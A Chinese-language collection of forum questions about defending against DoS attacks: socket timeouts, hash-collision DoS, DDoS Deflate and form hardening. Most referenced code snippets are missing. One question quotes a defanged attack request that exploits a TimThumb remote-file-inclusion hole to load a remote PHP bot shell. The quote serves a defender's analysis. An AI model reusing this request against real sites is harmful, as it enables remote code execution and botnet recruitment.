问题标签 [ddos]

我的网站有一个 Javascript 方法，它发出 AJAX 请求以将商品添加到购物车，而无需重新加载页面并发出简单的通知。

然而，使用任何 Javascript 控制台，我发现你可以用一个简单的语句来处理这个请求：

并最终锁定服务器，直到浏览器崩溃。更稳定的浏览环境甚至可能无限期地锁定服务器。那么防止这种尝试的最佳方法是什么？

为了工作，我编写了一个专门的 HTTP 服务器，它只为网站执行 301/302/Frame 重定向。最近，一些邪恶的客户端故意打开套接字并每 500 毫秒写入一个字符，以克服我的 TCP 套接字超时。然后他们无限期地保持套接字打开，并让多个客户端在分布式拒绝服务中做同样的事情。这最终会耗尽处理 TCP 连接的线程池。您将如何编写代码以使其不易受到这种不良行为的影响？这是我的套接字接受代码：

timeout 和 socketTimeout 当前设置为 500 毫秒。

我的服务器 (mediaquarter.at) 目前正被这样的请求 DDoSed（有一些小的变化）：hXXp://www.mediaquarter.at/http://www.madeineurope.org.uk/media/functions/timthumb/ timthumb.php?src=http://blogger.com.midislandrental.com/.mods/sh.php（网址“已停用”，因此不会有人意外点击它）

如果您尝试下载引用的 PHP 文件，请注意：在 preg_replace 中激活了 /e 开关，并且代码包含多个 eval 语句 - 在您想查看之前清理它！看起来像 pBot，你可以在这里找到更多信息：http ://www.offensivecomputing.net/?q=node/1417

TimThumb 容易受到远程文件包含的影响 (http://eromang.zataz.com/2011/09/20/wordpress-timthumb-rfi-vulnerability-used-as-botnet-recruitment-vector/) - 似乎在WordPress。所以我会理解有人调用 hXXp://www.madeineurope.org.uk/media/functions/timthumb/timthumb.php?src=http://blogger.com.midislandrental.com/.mods/sh.php 来利用漏洞。

但是，尝试通过另一个网站 (mediaquarter.at) 调用它有什么意义，只会导致 404 错误消息？此外，我的服务器没有运行 WordPress，而是使用 SilverStripe，所以这似乎毫无意义。

这只是攻击者一方的错误/愚蠢，还是我在这里忽略了某种攻击媒介？

PS：服务器只是一些廉价的虚拟主机，我根本无法访问它，所以我无法验证系统是否有任何变化。

我想知道的是，当发生 ddos​​ 攻击时，谷歌分析会显示什么样的行为？有什么理论吗？

使用 node.js，构建一个可以处理 http 请求的 tcp 服务器的 net 模块。

我想防止dos攻击，所以我所做的是这样的：

我想知道使用它是否更好：

来自 API：

socket.destroy() # 确保此套接字上不再发生 I/O 活动。仅在出现错误时才需要（解析错误左右）。

有什么区别和好处？

下面的摘录来自一篇文章，该文章解释了由于散列数据结构中使用的非随机散列函数而导致拒绝服务 (DoS) 攻击的可能性。

[…] 可以通过利用底层散列算法中的可预测冲突来利用该条件。

为了验证它，我查看了 Oracle 的 Java HashMap 的参考实现，并确实找到了使用的静态哈希函数：

关于该主题的另一篇论文说：

Tomcat 6.0.32 服务器在 i7 CPU 时间的大约 44 分钟内解析 2 MB 的冲突键字符串，因此具有大约 6 kbit/s 的攻击者可以保持一个 i7 内核持续忙碌。如果攻击者有一个千兆连接，他可以让大约 100.000 个 i7 核心保持忙碌

我们如何才能防范此漏洞。此外，我们使用的许多软件都是依赖此实现的开源软件（Tomcat 等）。

问题描述为here。

已经有 1.8、JRuby 和更高版本的 ree 的补丁，但我找不到这个版本的任何东西。

我试着应用这个补丁。

但是编译失败并出现一个没有意义的错误，因为我可以看到编译器指令没有任何更改：

我为一个经常受到僵尸网络攻击的网站工作。我们已经开始使用这个工具：http ://deflate.medialayer.com/它会自动禁止打开连接数超过设定值的 ip。默认情况下它设置为 150，我们目前使用的是 250。

我想知道，搜索机器人和普通访问者不会被阻止的安全性有多低？

我正在考虑在注册表单中使用随机输入名称。可以这样做：

1. 用户请求注册表单站点。
2. 为输入字段创建随机名称并将它们保存到用户的会话中。
3. 呈现表单并将其显示给用户。

我只是想知道这种方法是否给了我任何东西。如果会话驱动程序是一个 cookie - 它使用我认为足够保存的第三方库以最好的方式加密和保护。如果用户不使用 cookie，我可以拒绝注册。
要将 cookie 作为潜在的安全风险删除，我可以将会话存储在数据库中。这似乎更安全，但也可能使服务器过载（？）。
我的问题很简单。实现这样的功能有什么意义吗？

大家好，我运行一个繁忙的 CentOS 网络服务器（nginx/php-fpm）来保护它免受某些攻击，我使用了一段时间http://deflate.medialayer.com/ 。我设置了一个白名单，其中包含 127.0.0.1、我的外部数据库服务器 IP 和大约 100 个搜索引擎抓取工具。

该系统在一段时间内运行良好，直到出于未知原因 DDos deflate 决定突然禁止 127.0.0.1。这阻止了 php-fpm 的运行。我改为将 FPM 切换到 unix 套接字，因此如果再次禁止 localhost，它会运行良好。

但是今天出乎意料的 DDOS deflate 禁止了我的外部数据库服务器。此 IP 始终被列入白名单，并且此 IP 始终远远超过设置的连接限制，因此白名单有效。但是今天出乎意料的是，这个IP也被禁止了，并被从白名单中删除。

我完全吓坏了，现在已经停止使用 DDOS deflate。这可能是什么原因造成的？DDOS deflate 一直在成功地禁止/取消禁止新 IP，并且它会尊重白名单。但有时，它只是从该白名单中随机删除项目，并禁止它们。

也许有人也知道 DDOS deflate 的好选择？我使用 IPTABLES。